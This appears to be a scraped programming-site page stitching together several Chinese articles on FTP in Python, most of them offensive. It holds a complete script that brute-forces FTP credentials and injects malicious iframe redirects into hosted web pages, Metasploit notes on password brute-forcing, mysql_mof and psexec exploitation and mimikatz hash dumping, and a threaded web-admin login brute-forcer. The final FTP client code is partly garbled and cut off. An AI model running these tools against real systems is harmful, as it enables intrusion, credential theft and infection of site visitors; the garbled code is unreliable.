GVKun编程网logo

笔记整理2——python实现ftp口令爆破(python ftp爆破)

13

本文将为您提供关于笔记整理2——python实现ftp口令爆破的详细介绍,我们还将为您解释pythonftp爆破的相关知识,同时,我们还将为您提供关于msf各种弱口令爆破、python写的http后台

本文将为您提供关于笔记整理2——python实现ftp口令爆破的详细介绍,我们还将为您解释python ftp爆破的相关知识,同时,我们还将为您提供关于msf各种弱口令爆破、python 写的http后台弱口令爆破工具、Python 实现 FTP 弱口令扫描器、python 实现ftp服务 简介的实用信息。

本文目录一览:

笔记整理2——python实现ftp口令爆破(python ftp爆破)

笔记整理2——python实现ftp口令爆破(python ftp爆破)

一.主要思路:

(1).匿名登陆模块:
def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login(''anonymous'', ''me@your.com'')
有的ftp服务器开启了匿名登录服务,则可以使用该账号密码进行登陆
user:''anonymous'',
password: ''me@your.com''

(2).密码和口令爆破模块
def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, ''r'')
    for line in pF.readlines():
        ''''''''''''
        ''''''''''''
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
可以通过收集的字典进行爆破

(3).查找默认页面
登陆上ftp服务后,客户以通过ftp.nlst()方法查找所有文件的名字,
遍历找寻index.htm,index.asp等文件。
def returnDefault(ftp):
    try:
        dirList = ftp.nlst()
找到后返回其文件名列表

(4).注入恶意代码
通过找到的文件名将其文件下载下来,注入重定向代码,使访问该服务器的
用户都重定向到我们的攻击机上的index页面,从而对浏览器发动攻击
def injectPage(ftp, page, redirect):
    f = open(page + ''.tmp'', ''w'')
    ftp.retrlines(''RETR '' + page, f.write)
    print ''[+] Downloaded Page: '' + page
''''''''''''''''''''
(5).整合全部的攻击,写成一个函数
登录,遍历文件,上传覆盖,完成对目标服务器的攻击。
难点在与登录成功。(验证了信息收集的重要性)
def attack(username,password,tgtHost,redirect):
    ftp = ftplib.FTP(tgtHost)
    ftp.login(username, password)
    defPages = returnDefault(ftp)
注意的是返回的index因该不止一个。

(6).关于连接肉机的说明
这部分攻击是有我们已获得的恶意服务器进行对用户浏览器的攻击,
主要通过浏览器的漏洞利用代码,当用户访问该服务器时,用户浏览器
会被注入恶意代码,从而向恶意服务器建立一个反向的shell。获得批量肉机。

具体实现尚未学习,可用metasploit框架中的漏洞利用代码。参考攻击
谷歌的极光行动。

3.主要利用模块
import ftplib
import optparse
import time

4.主要利用函数
def anonLogin(hostname):
def bruteLogin(hostname, passwdFile):
def returnDefault(ftp):
def injectPage(ftp, page, redirect):
def attack(username,password,tgtHost,redirect):

5.复习收获与总结
(1).端口映射的内容
https://baike.baidu.com/item/%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/98247?fr=aladdin

二.代码

#!/usr/bin/python
# -*- coding: utf-8 -*-
import ftplib
import optparse
import time


def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login(''anonymous'', ''me@your.com'')
        print ''\n[*] '' + str(hostname) \
            + '' FTP Anonymous Logon Succeeded.''
        ftp.quit()
        return True
    except Exception, e:
        print ''\n[-] '' + str(hostname) +\
          '' FTP Anonymous Logon Failed.''
        return False


def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, ''r'')
    for line in pF.readlines():
        time.sleep(1)
        userName = line.split('':'')[0]
        passWord = line.split('':'')[1].strip(''\r'').strip(''\n'')
        print ''[+] Trying: '' + userName + ''/'' + passWord
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print ''\n[*] '' + str(hostname) +\
              '' FTP Logon Succeeded: ''+userName+''/''+passWord
            ftp.quit()
            return (userName, passWord)
        except Exception, e:
            pass
    print ''\n[-] Could not brute force FTP credentials.''
    return (None, None)


def returnDefault(ftp):
    try:
        dirList = ftp.nlst()
    except:
        dirList = []
        print ''[-] Could not list directory contents.''
        print ''[-] Skipping To Next Target.''
        return

    retList = []
    for fileName in dirList:
        fn = fileName.lower()
        if ''.php'' in fn or ''.htm'' in fn or ''.asp'' in fn:
            print ''[+] Found default page: '' + fileName
        retList.append(fileName)
    return retList


def injectPage(ftp, page, redirect):
    f = open(page + ''.tmp'', ''w'')
    ftp.retrlines(''RETR '' + page, f.write)
    print ''[+] Downloaded Page: '' + page

    f.write(redirect)
    f.close()
    print ''[+] Injected Malicious IFrame on: '' + page

    ftp.storlines(''STOR '' + page, open(page + ''.tmp''))
    print ''[+] Uploaded Injected Page: '' + page


def attack(username,password,tgtHost,redirect):
    ftp = ftplib.FTP(tgtHost)
    ftp.login(username, password)
    defPages = returnDefault(ftp)
    for defPage in defPages:
        injectPage(ftp, defPage, redirect)


def main():
    parser = optparse.OptionParser(''usage %prog ''+\
      ''-H <target host[s]> -r <redirect page>''+\
      ''[-f <userpass file>]'')
    
    parser.add_option(''-H'', dest=''tgtHosts'',\
      type=''string'', help=''specify target host'')
    parser.add_option(''-f'', dest=''passwdFile'',\
      type=''string'', help=''specify user/password file'')
    parser.add_option(''-r'', dest=''redirect'',\
      type=''string'',help=''specify a redirection page'')

    (options, args) = parser.parse_args()
    tgtHosts = str(options.tgtHosts).split('','')
    passwdFile = options.passwdFile
    redirect = options.redirect

    if tgtHosts == None or redirect == None:
        print parser.usage
        exit(0)

    for tgtHost in tgtHosts:
        username = None
        password = None

        if anonLogin(tgtHost) == True:
            username = ''anonymous''
            password = ''me@your.com''
            print ''[+] Using Anonymous Creds to attack''
            attack(username, password, tgtHost, redirect)
      
        elif passwdFile != None:
            (username, password) =\
              bruteLogin(tgtHost, passwdFile)
            if password != None:
                ''[+] Using Creds: '' +\
                  username + ''/'' + password + '' to attack''
                attack(username, password, tgtHost, redirect)

if __name__ == ''__main__'':
    main()

msf各种弱口令爆破

msf各种弱口令爆破

Msf:

 

 写的很乱 记录下msf各个爆破弱口令的模块

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机

 

 

metasploit 增加路由

route add 10.10.1.3 255.255.255.0 1

 

 

使用扫描模块

use scanner/portscan/tcp

 

 

 

 

 

 

 

 

 

爆破ssh

Msf>use auxiliary/scanner/ssh/ssh_login  

 

 

 

爆破ftp

Msf>use auxiliary/scanner/ftp/ftp_login

 

 

 

爆破telnet

Msf>use auxiliary/scanner/telnet/telnet_login  

 

 

 

爆破smb

auxiliary/scanner/smb/smb_login

 

 

 

 

 

 

爆破Mysql

use scanner/mysql/mysql_login

 

msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt

PASS_FILE => /root/passlist.txt

 

 

 

 

 

使用mof模块进行权限获取

use windows/mysql/mysql_mof

msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456

PASSWORD => 123456

msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3

rhost => 10.10.1.3

msf exploit(windows/mysql/mysql_mof) > set USERNAME root

USERNAME => root

msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(windows/mysql/mysql_mof) > exploit

 

 

 

 

Mimikatz导出hash

meterpreter > load mimikatz

 

meterpreter > kerberos

 

 

 

 

一些域内的命令

 

查看域
net view /domain

查看当前域中的计算机
net view

查看CORP域中的计算机
net view /domain:CORP

Ping计算机名可以得到IP
ping Wangsong-PC

获取所有域的用户列表
net user /domain

获取域用户组信息
net group /domain

获取当前域管理员信息
net group "domain admins" /domain

查看域时间及域服务器的名字
net time /domain

net time /domain 就可以知道域的计算机名

WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控

net group "domain admins" /domain 

 

 

 

 

 

 

 

 

 

 

 

 

反弹shell

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit

 

python 写的http后台弱口令爆破工具

python 写的http后台弱口令爆破工具

今天来弄一个后台破解的python小程序,哈哈,直接上代码吧,都有注释~~

# -*- coding: utf-8 -*-
# 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
import urllib2
import urllib
import httplib
import threading
  
headers = {"Content-Type":"application/x-www-form-urlencoded",     
           "Connection":"Keep-Alive",
           "Referer":"http://www.xxxxx.com/"};# referer:是代理的访问来源地址
# lock = threading.Lock()
def tryUser(user,password):
    #print user,password
    global headers
    global outFile 
    conn = httplib.HTTPConnection("www.xxxxx.com") # 远程域名
    if len(user) < 3:     # 限制用户名长度,排除字典中的无用数据
        return  # 主动退出线程
    else:
        #lock.acquire()   # 多线程操作文件,提前加锁,用后释放
        #line = inFile.readline()
          
        #userData = line.strip().split(&#39; # &#39;) # strip() 默认去除空白字符包括&#39; &#39;,&#39;\t&#39;,&#39;\n&#39;等
        #lock.release()
  
        user = user.strip()
        passwd = password.strip()
        params = urllib.urlencode({&#39;username&#39;: user, &#39;password&#39;: passwd})
        conn.request(method="POST", url="/users/login", body=params, headers=headers) # 后台路径
        responseText = conn.getresponse().read().decode(&#39;utf8&#39;) # 网页编码
        #print responseText  # 第一次可以打印看看是否解析
        if not responseText.find(u&#39;用户名或者密码不正确,请重新输入!&#39;) > 0 :
            print &#39;----- find user:&#39;, user, &#39;with password:&#39;, passwd, &#39;-----&#39;
            outFile.write(user + &#39;    &#39; +  passwd + &#39;\n&#39;)
              
    return
  
outFile = open(&#39;accounts-cracked.txt&#39;, &#39;w&#39;)
  
if __name__ == &#39;__main__&#39;:
    tsk=[] # 创建线程池
    with open(r&#39;user.dic&#39;, &#39;r&#39;) as fUser:  # 使用with as 来打开文件,不需自己关闭文件,因为他会自己在合适的时候自已关闭(类似C# 中的using(...){}接口)
        with open(r&#39;pass.dic&#39;, &#39;r&#39;) as fPass:
            for user in fUser.readlines():
                for password in fPass.readlines():
                    t= threading.Thread(target = tryUser,args=(user,password))
                    t.daemon = False # 设置不进行进程守护
                    tsk.append(t) # t.start()
                fPass.seek(0)
                # 记住这里要将文件重新移到文件首,不然就会出现只执行外层循环的第一条,因为内层在
                # 迭代之后(readlines()是迭代器的形式,迭代一次后文件指针就指到文件尾了,迭代器
                # 也是end了)第二次就没有password 在 fPass中,也就是说 for  password in fPass.readlines():
                # 为空,所以这里的内层循环就不会被执行了,因此也就是迭代器清零的问题(C ++ itertor 常有)
                   
                      
# join()无参数就是完全阻塞主线程,等待线程执行完 有参数就是说,
# 在主线程等待一秒后就不阻塞线程了,继续执行主线程,这里的意思是一秒钟开一个线程
# 不能再thread start之前调用join(), 因为join() 是线程运行时调度
    for t in tsk:
        t.start()
        t.join(1) 
  
  
  
    print "All thread OK,maybe not "
    outFile.close()
登录后复制

Python 实现 FTP 弱口令扫描器

Python 实现 FTP 弱口令扫描器

图片描述

一、项目说明

1.1 项目简介

本次实验通过使用 Python 实现一个 FTP 弱口令扫描器开始,入门 Python 渗透测试技术,实验涉及 FTP 协议原理,ftplib 库的使用等知识点。

本教程由作者向实验楼投稿发布,完整教程及在线练习地址:Python 实现 FTP 弱口令扫描器

1.2 目标学员

  • 具有Python语言基础,不会的同学请到隔壁班先去学一下

1.3 Python版本

  • Python3.x

1.4 知识点

本实验涉及如下知识点:

  1. 认识Ftp服务器

  2. Ftplib库的使用

  3. argparse库的使用

  4. Ubuntu下Ftp服务器的搭建

1.5 效果图

本节实验将实现如下功能的 FTP 弱口令扫描器:

此处输入图片的描述

二、 理论基础

以下内容整理自百度百科,参考链接:

  • 百度百科-FTP服务器

2.1 FTP服务器

FTP服务器(File Transfer Protocol Server)是在互联网上提供文件存储和访问服务的计算机,它们依照FTP协议提供服务。 FTP是File Transfer Protocol(文件传输协议)。顾名思义,就是专门用来传输文件的协议。简单地说,支持FTP协议的服务器就是FTP服务器。

FTP是仅基于TCP的服务,不支持UDP。与众不同的是FTP使用2个端口,一个数据端口和一个命令端口(也可叫做控制端口)。通常来说这两个端口是21(命令端口)和20(数据端口)。但FTP 工作方式的不同,数据端口并不总是20。这就是主动与被动FTP的最大不同之处。主要有两种工作模式:

  • 主动FTP

FTP服务器的控制端口是21,数据端口是20,所以在做静态映射的时候只需要开放21端口即可,他会用20端口和客户端主动的发起连接。

  • 被动FTP

服务器的控制端口是21,数据端口是随机的,且是客户端去连接对应的数据端口,所以在做静态的映射话只开放21端口是不可以的。此时需要做DMZ。

2.2 Ftp扫描器实现方案

本课程开发Ftp扫描器主要从以下两个方面着手:

扫描匿名Ftp

Ftp匿名登录的扫描主要应用于批量扫描中,单独针对一个Ftp服务器进行扫描的话成功几率比较小,不过也不排除成功的可能。估计讲到这里的时候,有的同学就有疑问了!!!现在还有人不设置密码吗?那得傻到啥程度?用东北的话来说那不就是傻狍子吗!!!(开个玩笑,免得同学们看我的教程睡着了!)不过言归正传,很多网站都开放Ftp服务方便用户下载资源(这个允许匿名登录不足为奇),更疯狂的是网站管理人员为了方便网站访问软件的更新也开放了Ftp匿名登录(估计不是自己家的网站......)。这样就给了我们很多机会,尤其后者的服务器很容易就受到攻击,后期我会讲解Ftp目录下可以搜到web页面之后怎样拿到Shell(大家多多关注我的教程吧,还有很多精品课程等着你!)。

扫描Ftp弱口令

Ftp弱口令扫描其实就是暴力破解,为何我们不称为暴力破解呢?因为我们只是扫描一些简单的密码组合,并不是所有可能得密码组合,而且我们也没有那么多时间去暴力破解,谁让我们活不了成千上万年呢!只是一个密码而已,弱口令扫不到就算了,天涯何处无芳草何必单恋一枝花呢!不过你要非喜欢这个Ftp服务器的话,以后我再教大家别的方法渗透服务器!

三、代码实现

3.1 Ftp匿名扫描器的实现

这里我们要用到Python的ftplib库中的Ftp这个类,Ftp这个类实现了Ftp客户端的大多数功能,比如连接Ftp服务器、查看服务器中的文件、上传、下载文件等功能,详细用法可以查看一下文档,以后碰到问题也要养成先看文档的习惯!接下来我们来定义anonScan(hostname)这个函数以实现扫描可匿名登录的Ftp服务器。代码如下:

#匿名登录扫描
def anonScan(hostname):                 #参数是主机名
    try:
        with FTP(hostname) as ftp:      #创建Ftp对象
            ftp.login()                 #Ftp匿名登录
            print(''\n[*] '' + str(hostname) + " FTP Anonymous login successful!") #不抛出异常则表明登录成功
            return True
    except Exception as e:              #抛出异常则表明匿名登录失败
        print(''\n[-] '' + str(hostname) + " FTP Anonymous logon failure!")
        return False

代码很简短,主要在注释中解释了代码的含义。这里说一下这个函数的思路,首先用主机名构造了一个Ftp对象(即ftp),然后用这个ftp调用不带任何参数的login()函数即表示要匿名登录这个Ftp服务器,如果登录过程中没有产生异常,则表明匿名登录成功,否则匿名登录失败!

3.2 Ftp弱口令的扫描

Ftp弱口令的扫描依赖于用户名和密码字典,我们的实验环境中会提供 pwd.txt 作为密码字典,字典的格式如下图所示:

图片描述

接下来我们针对字典中的格式来实现Ftp弱口令的扫描,代码如下:

#暴力破解
def vlcLogin(hostname, pwdFile):                #参数(主机名,字典文件)
    try:
        with open(pwdFile, ''r'') as pf:          #打开字典文件
            for line in pf.readlines():         #循环读取字典文件中的每一行
                time.sleep(1)                   #等待1秒
                userName = line.split('':'')[0]   #从读取的内容中取出用户名
                passWord = line.split('':'')[1].strip(''\r'').strip(''\n'') #从读取的内容中取出密码
                print(''[+] Trying: '' + userName + '':'' + passWord)
                try:
                    with FTP(hostname) as ftp:  #以主机名为参数构造Ftp对象
                        ftp.login(userName, passWord)   #使用读取出的用户名密码登录Ftp服务器
                        #如果没有产生异常则表示登录成功,打印主机名、用户名和密码
                        print(''\n[+] '' + str(hostname) + '' FTP Login successful: ''+ \
                              userName + '':'' + passWord)
                        return (userName, passWord)
                except Exception as e:
                    # 产生异常表示没有登录成功,这里我们不用管它,继续尝试其他用户名、密码
                    pass
    except IOError as e:
        print(''Error: the password file does not exist!'')
    print(''\n[-] Cannot crack the FTP password, please change the password dictionary try again!'')
    return (None,None)

这段代码其实就是循环从字典中读取用户名和密码并尝试登陆,登陆成功则表明找到用户名和密码。由于这个函数将主机名定义成了可以用“,”分割的字符串。找到密码并不会终止程序,而是会继续扫描其他主机的弱口令,直到所有的主机都扫描一遍。

3.3 命令行解析

至此我们的Ftp扫描器已经几乎完成了,代码并不多,也很简单。现在我们需要做的是让我们的脚本可以处理命令行输入,以控制扫描哪些主机。处理命令行参数我们将用到Python中的argparse库,这个库是Python中自带的模块,处理命令行将变得非常简单,下面我们一起见证一下argparse的强大之处,先上代码:

# 这里用描述创建了ArgumentParser对象
    parser = argparse.ArgumentParser(description = ''FTP Scanner'')
    # 添加-H命令dest可以理解为咱们解析时获取-H参数后面值的变量名,help是这个命令的帮助信息
    parser.add_argument(''-H'',dest=''hostName'',help=''The host list with ","space'')
    parser.add_argument(''-f'',dest=''pwdFile'',help=''Password dictionary file'')
    options = None
    try:
        options = parser.parse_args()

    except:
        print(parser.parse_args([''-h'']))
        exit(0)
    hostNames = str(options.hostName).split('','')
    pwdFile = options.pwdFile

通过argparse库来解析命令行参数,可以根据添加参数时指定的help关键字的内容来自动生成帮助文档。具体效果如下图所示:

此处输入图片的描述

在处理复杂命令的时候argparse的强大就更明显了,由于这个属于Python基础,所以Python库中自带的库这里我就不做过多的介绍了。

四、实验环境搭建测试

本项目完整代码和环境搭建、测试,可在实验楼中查看并在线完成。

五、总结

本次项目实现了Ftp弱口令扫描器,主要用到以下知识点:

  1. Ftp服务器的基本概念

  2. 使用ftplib如何一步一步的实现Ftp弱口令扫描器

  3. 使用argparse解析命令行参数

  4. 实验环境的搭建方法

六、参考文献

  • 《Python绝技--运用Python成为顶级黑客》

  • 《Python黑帽子-- 黑客与渗透测试编程之道 》

:本系列项目教学思路,参考自《Python绝技--运用Python成为顶级黑客》,书中代码和教学思路只做参考,本系列教程全部重新设计并基于Python3.x重写。本系列课程旨在教大家渗透测试,维护网络安全,如用于非法目的,自行承担法律责任!

python 实现ftp服务 简介

python 实现ftp服务 简介

目录

一. Python搭建FTP服务器

二. FTP函数释义

三. 查看目录结构

四. 上传下载程序


一. Python搭建FTP服务器

1. 搭建FTP服务器的Server端

# -*- coding:utf-8 -*-
from pyftpdlib.authorizers import DummyAuthorizer
from  pyftpdlib.handlers  import FTPHandler
from  pyftpdlib.servers import FTPServer
# 实例化DummyAuthorizer来创建ftp用户
authorizer = DummyAuthorizer()
# 参数:用户名,密码,目录,权限
authorizer.add_user('admin','123456',r'C:\Users\Administrator\Desktop\ftp',perm='elradfmwMT')
# 匿名登录
# authorizer.add_anonymous('/home/nobody')
handler = FTPHandler
handler.authorizer = authorizer
# 参数:IP,端口,handler
server = FTPServer(('0.0.0.0',2121),handler)           #设置为0.0.0.0为本机的IP地址
server.serve_forever()

2. FTP服务器的客户端连接

# -*- coding: utf-8 -*-
from ftplib import FTP
import time,tarfile,os


#连接ftp
def ftpconnect(host,port,username,password):
    ftp = FTP()
    # 打开调试级别2,显示详细信息
    # ftp.set_debuglevel(2)
    ftp.connect(host,port)
    ftp.login(username,password)
    return ftp

#从ftp下载文件
def downloadfile(ftp,remotepath,localpath):
    # 设置的缓冲区大小
    bufsize = 1024
    fp = open(localpath,'wb')
    ftp.retrbinary('RETR ' + remotepath,fp.write,bufsize)
    ftp.set_debuglevel(0)# 参数为0,关闭调试模式
    fp.close()

#从本地上传文件到ftp
def uploadfile(ftp,localpath):
    bufsize = 1024
    fp = open(localpath,'rb')
    ftp.storbinary('STOR ' + remotepath,fp,bufsize)
    ftp.set_debuglevel(0)
    fp.close()

if __name__ == "__main__":
    #host,password
    ftp = ftpconnect("192.168.10.113",2121,"admin","123456")
    #下载文件,第一个是ftp服务器路径下的文件,第二个是要下载到本地的路径文件
    downloadfile(ftp,"/12.mp3",r"C:\Users\Administrator\Desktop\ftp\download\test.mp3")
    # 上传文件,第一个是要上传到ftp服务器路径下的文件,第二个是本地要上传的的路径文件
    uploadfile(ftp,'/upload/1.txt',"C:/Users/Administrator/Desktop/1.txt")
    # ftp.close() #关闭ftp
    # #调用本地播放器播放下载的视频
    # os.system('start D:\soft\kugou\KGMusic\KuGou.exe C:\Users\Administrator\Desktop\ftp\test.mp3')

    print(ftp.getwelcome())# 打印出欢迎信息
    # 获取当前路径
    pwd_path = ftp.pwd()
    print("FTP当前路径:",pwd_path)
    # 显示目录下所有目录信息
    # ftp.dir()
    # 设置FTP当前操作的路径
    ftp.cwd('/upload/')
    # 返回一个文件名列表
    filename_list = ftp.nlst()
    print(filename_list)

    ftp.mkd('目录名')# 新建远程目录
    ftp.rmd('目录名')  # 删除远程目录
    ftp.delete('文件名')  # 删除远程文件
    ftp.rename('fromname','toname')  # 将fromname修改名称为toname

    # 逐行读取ftp文本文件
    file = '/upload/1.txt'
    # ftp.retrlines('RETR %s' % file)
    #与 retrlines()类似,只是这个指令处理二进制文件。回调函数 cb 用于处理每一块(块大小默认为 8KB)下载的数据
    # ftp.retrbinary('RETR %s' % file) 

二. FTP函数释义

Python中默认安装的ftplib模块定义了ftp类,其中函数有限,可用来实现简单的ftp客户端,用于上传或下载文件,函数列举如下

ftp登陆连接
from ftplib import FTP            #加载ftp模块
ftp=FTP()                         #设置变量
ftp.set_debuglevel(2)             #打开调试级别2,显示详细信息
ftp.connect("IP","port")          #连接的ftp sever和端口
ftp.login("user","password")      #连接的用户名,密码
print ftp.getwelcome()            #打印出欢迎信息
ftp.cmd("xxx/xxx")                #进入远程目录
bufsize=1024                      #设置的缓冲区大小
filename="filename.txt"           #需要下载的文件
file_handle=open(filename,"wb").write #以写模式在本地打开文件
ftp.retrbinaly("RETR filename.txt",file_handle,bufsize) #接收服务器上文件并写入本地文件
ftp.set_debuglevel(0)             #关闭调试模式
ftp.quit()                        #退出ftp

ftp相关命令操作
ftp.cwd(pathname)                 #设置FTP当前操作的路径
ftp.dir()                         #显示目录下所有目录信息
ftp.nlst()                        #获取目录下的文件
ftp.mkd(pathname)                 #新建远程目录
ftp.pwd()                         #返回当前所在位置
ftp.rmd(dirname)                  #删除远程目录
ftp.delete(filename)              #删除远程文件
ftp.rename(fromname,toname)#将fromname修改名称为toname。
ftp.storbinaly("STOR filename.txt",file_handel,bufsize)  #上传目标文件
ftp.retrbinary("RETR filename.txt",bufsize)  #下载FTP文件

FTP.quit()与FTP.close()的区别

FTP.quit():发送QUIT命令给服务器并关闭掉连接。这是一个比较“缓和”的关闭连接方式,但是如果服务器对QUIT命令返回错误时,会抛出异常。

FTP.close():单方面的关闭掉连接,不应该用在已经关闭的连接之后,例如不应用在FTP.quit()之后。

FTP对象方法说明

login(user=’anonymous’,passwd=”,acct=”) 登录 FTP 服务器,所有参数都是可选的
pwd() 获得当前工作目录
cwd(path) 把当前工作目录设置为 path 所示的路径
dir ([path[,…[,cb]]) 显示 path 目录里的内容,可选的参数 cb 是一个回调函数,会传递给 retrlines()方法
nlst ([path[,…]) 与 dir()类似, 但返回一个文件名列表,而不是显示这些文件名
retrlines(cmd [,cb]) 给定 FTP命令(如“ RETR filename”),用于下载文本文件。可选的回调函数 cb 用于处理文件的每一行
retrbinary(cmd,cb[,bs=8192[,ra]]) 与 retrlines()类似,只是这个指令处理二进制文件。回调函数 cb 用于处理每一块(块大小默认为 8KB)下载的数据
storlines(cmd,f) 给定 FTP 命令(如“ STOR filename”),用来上传文本文件。要给定一个文件对象 f
storbinary(cmd,f,[,bs=8192]) 与 storlines()类似,只是这个指令处理二进制文件。要给定一个文件对象 f,上传块大小 bs 默认为 8KB
rename(old,new) 把远程文件 old 重命名为 new
delete(path) 删除位于 path 的远程文件
mkd(directory) 创建远程目录
rmd(directory) 删除远程目录
quit() 关闭连接并退出

 

三. 查看目录结构

ftp.dir() 能显示目录下的文件信息,考虑到要分别对文件夹个数和文件数目进行统计,文件夹下存在文件夹和文件嵌套;将dir()后的目录信息放入列表,对列表进行操作;进入子文件夹后进行递归调用操作。

# -*- coding: utf-8 -*-
 
from ftplib import FTP
 
ftp = FTP()
ftp.connect('132.121.xx.xxx','xx909')
ftp.login('crmyun_xxx','wyjjjjxJ')
sum1 = 0
sum2 = 0
value = 0
 
def search_file(start_dir):
 ftp.cwd(start_dir)
 print ftp.pwd()
 dir_res = []
 ftp.dir('.',dir_res.append) #对当前目录进行dir(),将结果放入列表
 for i in dir_res:
  if i.startswith("d"):
   global sum1 
   sum1 += 1
   search_file(ftp.pwd()+"/"+i.split(" ")[-1])
   ftp.cwd('..')
  else:
   global sum2,value
   sum2 += 1
   val = i.split(" ")[-1]
   value += ftp.size(val)
   if ftp.pwd().endswith('/'):    
#    print ftp.pwd()+val+"  "+str(ftp.size(val))+" B" #打印出每个文件路径和大小
    pass
   else:    
#    print ftp.pwd()+"/"+val+"  "+str(ftp.size(val))+" B"
    pass
def sum_file(file_path):
 search_file(file_path)
 print "folder number is "+str(sum1)+",file number is "+str(sum2)+",Totle size is "+str(value)+" B"
  
 
if __name__ == '__main__':
 sum_file("/apps/crmyun/crmyun_755")

展示结果:

四. 上传下载程序

完整上传程序

Python中默认安装的ftplib模块定义了ftp类,其中函数有限,可用来实现简单的ftp客户端,用于上传或下载文件

# coding: utf-8
from ftplib import FTP
import time
import tarfile
import os
# !/usr/bin/python
# -*- coding: utf-8 -*-
 
from ftplib import FTP
 
def ftpconnect(host,password):
 ftp = FTP()
 # ftp.set_debuglevel(2)
 ftp.connect(host,21)
 ftp.login(username,password)
 return ftp
 
#从ftp下载文件
def downloadfile(ftp,localpath):
 bufsize = 1024
 fp = open(localpath,'wb')
 ftp.retrbinary('RETR ' + remotepath,bufsize)
 ftp.set_debuglevel(0)
 fp.close()
 
#从本地上传文件到ftp
def uploadfile(ftp,'rb')
 ftp.storbinary('STOR ' + remotepath,bufsize)
 ftp.set_debuglevel(0)
 fp.close()
 
if __name__ == "__main__":
 ftp = ftpconnect("113.105.139.xxx","ftP***","Guest***")
 downloadfile(ftp,"Faint.mp4","C:/Users/Administrator/Desktop/test.mp4")
 #调用本地播放器播放下载的视频
 os.system('start "C:\Program Files\Windows Media Player\wmplayer.exe" "C:/Users/Administrator/Desktop/test.mp4"')
 uploadfile(ftp,"C:/Users/Administrator/Desktop/test.mp4","test.mp4")
 
 ftp.quit()

server main 代码:

# _*_ coding:utf-8 _*_
import os,sys,json,hashlib,socketserver,time
 
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(base_dir)
from conf import userdb_set
class Ftp_server(socketserver.BaseRequestHandler):
 user_home_dir = ''
 def auth(self,*args):
  '''验证用户名及密码'''
  cmd_dic = args[0]
  username = cmd_dic["username"]
  password = cmd_dic["password"]
  f = open(userdb_set.userdb_set(),'r')
  user_info = json.load(f)
  if username in user_info.keys():
   if password == user_info[username]:
    self.request.send('0'.encode())
    os.chdir('/home/%s' % username)
    self.user_home_dir = os.popen('pwd').read().strip()
    data = "%s login successed" % username
    self.loging(data)
   else:
    self.request.send('1'.encode())
    data = "%s login Failed" % username
    self.loging(data)
    f.close
  else:
   self.request.send('1'.encode())
   data = "%s login Failed" % username
   self.loging(data)
   f.close
   ##########################################
 
 def get(self,*args):
  '''给客户端传输文件'''
  request_code = {
   '0': 'file is ready to get','1': 'file not found!'
  }
  cmd_dic = args[0]
  self.loging(json.dumps(cmd_dic))
  filename = cmd_dic["filename"]
  if os.path.isfile(filename):
   self.request.send('0'.encode('utf-8')) # 确认文件存在
   self.request.recv(1024)
   self.request.send(str(os.stat(filename).st_size).encode('utf-8'))
   self.request.recv(1024)
   m = hashlib.md5()
   f = open(filename,'rb')
   for line in f:
    m.update(line)
    self.request.send(line)
   self.request.send(m.hexdigest().encode('utf-8'))
   print('From server:Md5 value has been sended!')
   f.close()
  else:
   self.request.send('1'.encode('utf-8'))
   ###########################################
 
 def cd(self,*args):
  '''执行cd命令'''
  user_current_dir = os.popen('pwd').read().strip()
  cmd_dic = args[0]
  self.loging(json.dumps(cmd_dic))
  path = cmd_dic['path']
  if path.startswith('/'):
   if self.user_home_dir in path:
    os.chdir(path)
    new_dir = os.popen('pwd').read()
    user_current_dir = new_dir
    self.request.send('Change dir successfully!'.encode("utf-8"))
    data = 'Change dir successfully!'
    self.loging(data)
   elif os.path.exists(path):
    self.request.send('Permission Denied!'.encode("utf-8"))
    data = 'Permission Denied!'
    self.loging(data)
   else:
    self.request.send('Directory not found!'.encode("utf-8"))
    data = 'Directory not found!'
    self.loging(data)
  elif os.path.exists(path):
   os.chdir(path)
   new_dir = os.popen('pwd').read().strip()
   if self.user_home_dir in new_dir:
    self.request.send('Change dir successfully!'.encode("utf-8"))
    user_current_dir = new_dir
    data = 'Change dir successfully!'
    self.loging(data)
   else:
    os.chdir(user_current_dir)
    self.request.send('Permission Denied!'.encode("utf-8"))
    data = 'Permission Denied!'
    self.loging(data)
  else:
   self.request.send('Directory not found!'.encode("utf-8"))
   data = 'Directory not found!'
   self.loging(data)
   ###########################################
 
 def rm(self,*args):
  request_code = {
   '0': 'file exist,and Please confirm whether to rm','1': 'file not found!'
  }
  cmd_dic = args[0]
  self.loging(json.dumps(cmd_dic))
  filename = cmd_dic['filename']
  if os.path.exists(filename):
   self.request.send('0'.encode("utf-8")) # 确认文件存在
   client_response = self.request.recv(1024).decode()
   if client_response == '0':
    os.popen('rm -rf %s' % filename)
    self.request.send(('File %s has been deleted!' % filename).encode("utf-8"))
    self.loging('File %s has been deleted!' % filename)
   else:
